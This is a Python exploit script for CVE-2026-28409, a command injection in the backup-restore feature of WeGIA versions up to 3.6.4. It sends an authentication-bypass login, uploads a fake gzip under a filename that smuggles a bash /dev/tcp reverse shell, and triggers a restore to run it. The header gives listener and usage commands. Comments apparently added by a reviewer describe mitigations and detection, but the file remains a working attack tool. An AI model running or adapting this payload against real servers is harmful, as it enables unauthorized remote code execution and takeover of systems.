#!/usr/bin/env python3
# Exploit Title: WeGIA <= 3.6.4 Remote Code Execution via OS Command Injection in Backup Restore
# CVE: CVE-2026-28409
# Date: 2026-02-28
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# Author GitHub:
# Vendor Homepage: https://github.com/LabRedesCefetRJ/WeGIA
# Software Link: https://github.com/LabRedesCefetRJ/WeGIA
# Affected: WeGIA <= 3.6.4
# Tested on:
# Category: Webapps
# Platform: PHP
# Exploit Type: Remote
# CVSS: 10.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
# CWE: CWE-78
# Description: OS Command Injection in backup/restore functionality allowing unauthenticated RCE when combined with authentication bypass
# Fixed in: 3.6.5
# Usage: python3 exploit.py <target_url> --lhost <your_ip> --lport <your_port>
#
# Examples:
# python3 exploit.py http://192.168.1.100/WeGIA --lhost 192.168.1.50 --lport 4444
#
# Options:
# --lhost Attacker IP for reverse shell
# --lport Attacker listening port
#
# Notes:
# - Requires netcat listener: nc -lvnp <port>
# - Uses authentication bypass + command injection in filename during restore
# - Payload is reverse shell via bash
#
# How to Use
#
# Step 1: Start listener
# nc -lvnp 4444
#
# Step 2: Run exploit
# python3 exploit.py http://target/WeGIA --lhost 10.10.14.5 --lport 4444
import requests
import urllib3
import urllib.parse
import argparse
import sys
import time
# Silence the InsecureRequestWarning that urllib3 emits on every request once
# certificate verification is turned off (the session in main() sets verify=False).
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Cosmetic console banner. It is printed at import time (module-level side
# effect), so importing this file also prints it.
BANNER = r"""
╔════════════════════════════════════════════════════════════════════════════════════════════╗
║ ║
║ ▄▄▄▄· ▄▄▄ . ▄▄ • ▄▄▄▄▄ ▄▄▄ ▄▄▄· ▄▄▄· ▄▄▄▄▄▄▄▄▄ .▄▄▄ ▄• ▄▌ ║
║ ▐█ ▀█▪▀▄.▀·▐█ ▀ ▪•██ ▪ ▀▄ █·▐█ ▀█ ▐█ ▄█•██ ▀▀▄.▀·▀▄ █·█▪██▌ ║
║ ▐█▀▀█▄▐▀▀▪▄▄█ ▀█ ▐█.▪ ▄█▀▄ ▐▀▀▄ ▄█▀▀█ ██▀· ▐█.▪▐▀▀▪▄▐▀▀▄ █▌▐█· ║
║ ██▄▪▐█▐█▄▄▌▐█▄▪▐█ ▐█▌·▐█▌.▐▌▐█•█▌▐█ ▪▐▌▐█▪·• ▐█▌·▐█▄▄▌▐█•█▌▐█▄█▌ ║
║ ·▀▀▀▀ ▀▀▀ ·▀▀▀▀ ▀▀▀ ▀█▄▀▪.▀ ▀ ▀ ▀ .▀ ▀▀▀ ▀▀▀ .▀ ▀ ▀▀▀ ║
║ ║
║ b a n y a m e r _ s e c u r i t y ║
║ ║
║ >>> Silent Hunter • Shadow Presence <<< ║
║ ║
║ Operator : Mohammed Idrees Banyamer Jordan 🇯🇴 ║
║ Handle : @banyamer_security ║
║ ║
║ CVE-2026-28409 • WeGIA Backup Restore Command Injection ║
║ ║
╚════════════════════════════════════════════════════════════════════════════════════════════╝
"""
print(BANNER)
def parse_args():
    """Parse the command line: a positional target URL plus required --lhost/--lport.

    Returns:
        argparse.Namespace with attributes ``target``, ``lhost`` and ``lport``
        (all kept as strings; no validation beyond presence).
    """
    cli = argparse.ArgumentParser(description="WeGIA CVE-2026-28409 RCE Exploit")
    # (name, keyword options) for each argument, registered in declaration order.
    spec = (
        ("target", {"help": "Target URL (e.g. http://192.168.1.100/WeGIA)"}),
        ("--lhost", {"required": True, "help": "Attacker IP for reverse shell"}),
        ("--lport", {"required": True, "help": "Attacker listening port"}),
    )
    for flag, options in spec:
        cli.add_argument(flag, **options)
    return cli.parse_args()
def build_payload(lhost, lport):
    """Return the upload filename that carries the injected shell command.

    The name wraps a command between two ';' separators. It only has an effect
    if the server interpolates the filename into a shell command line during
    restore (the CWE-78 sink the header describes); that server-side code is
    not visible here — verify against the 3.6.5 fix. Mitigation on the server
    side is a strict allow-list on the stored filename and passing it to the
    restore command without a shell (escapeshellarg or argument arrays).

    Args:
        lhost: host the reverse shell connects back to (string, unvalidated).
        lport: port the reverse shell connects to (string, unvalidated).

    Returns:
        str: the crafted filename.
    """
    # bash reverse shell over /dev/tcp; only host and port vary per run.
    revshell = f"bash -c 'bash -i >& /dev/tcp/{lhost}/{lport} 0>&1'"
    # ';' ends whatever command the filename is spliced into; the '.tar.gz'
    # suffix presumably satisfies an extension check on upload — TODO confirm.
    filename = f"dump;{revshell};poc.tar.gz"
    return filename
def main():
    """Run the three-step chain: session setup, backup upload, restore trigger.

    All three steps go through one requests.Session with certificate
    verification disabled. A non-success status or a connection error in the
    first two steps exits with status 1; the final step never aborts. Nothing
    is returned and no response body is ever inspected.
    """
    args = parse_args()
    base_url = args.target.rstrip('/')
    lhost = args.lhost
    lport = args.lport  # raw string; never checked to be a port number
    session = requests.Session()
    session.verify = False  # accept any TLS certificate (self-signed lab targets)
    malicious_filename = build_payload(lhost, lport)
    print(f"[*] Generated malicious filename: {malicious_filename}")
    # 20 bytes that start with the gzip magic (1f 8b 08); not a usable dump.
    # Presumably only needs to pass a content/type check on upload — TODO confirm.
    dummy_content = (
        b"\x1f\x8b\x08\x00\x00\x00\x00\x00\x00\x03"
        b"\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    )
    # Step 1: POST c/cpf/id_pessoa to login.php. How these fields bypass
    # authentication is not visible in this file (see the header description).
    print("[*] Attempting authentication bypass + admin session")
    login_url = f"{base_url}/html/login.php"
    bypass_data = {
        'c': 'true',
        'cpf': 'admin',
        'id_pessoa': '1'
    }
    try:
        r = session.post(login_url, data=bypass_data, timeout=10)
        # NOTE(review): a 200 only shows the endpoint answered; the login form
        # itself renders with 200, so this does not prove a privileged session.
        if r.status_code != 200:
            print(f"[-] Login bypass failed (status {r.status_code})")
            sys.exit(1)
        print("[+] Auth bypass appears successful")
    except Exception as e:  # broad on purpose: any network/requests failure aborts
        print(f"[-] Connection error during login: {e}")
        sys.exit(1)
    # Step 2: multipart upload of the dummy archive under the crafted name.
    # Detection: POSTs to importar_dump.php whose 'import' part filename
    # contains shell metacharacters (';' here).
    print("[*] Uploading dummy backup with malicious filename")
    upload_url = f"{base_url}/html/configuracao/importar_dump.php"
    files = {
        'import': (malicious_filename, dummy_content, 'application/gzip')
    }
    upload_data = {
        'usuario': '1',
        'id_pessoa': '1'
    }
    try:
        r = session.post(upload_url, files=files, data=upload_data, timeout=12)
        # 302 is accepted as success because the app may redirect after upload.
        if r.status_code not in (200, 201, 302):
            print(f"[-] Upload failed (status {r.status_code})")
            sys.exit(1)
        print("[+] Upload completed")
    except Exception as e:
        print(f"[-] Upload error: {e}")
        sys.exit(1)
    # Step 3: GET gerenciar_backup.php?action=restore&file=<crafted name>.
    # The 'file' value is the point where the injected command is expected to
    # reach a shell (CWE-78). Redirects are not followed and `r` is never read
    # afterwards: only sending the request matters to this script.
    # Detection: a 'file' parameter on this endpoint containing ';' or '/dev/tcp'.
    print("[*] Triggering restore → attempting RCE")
    restore_url = f"{base_url}/html/configuracao/gerenciar_backup.php"
    params = {
        'action': 'restore',
        'file': malicious_filename,
        'usuario': '1',
        'id_pessoa': '1'
    }
    try:
        r = session.get(restore_url, params=params, allow_redirects=False, timeout=15)
        print("[*] Restore request sent")
        print("[*] Check your listener for incoming reverse shell")
        print(f"[*] If no connection after 10-20s → target may be patched / firewall blocked / wrong path")
    except Exception as e:
        # Non-fatal by design: the closing message below prints either way.
        print(f"[-] Error during restore trigger: {e}")
    print("\nExploit finished. Waiting for shell...\n")
# Script entry point. Note that BANNER is printed at import time regardless,
# since that print() sits at module level above.
if __name__ == "__main__":
    main()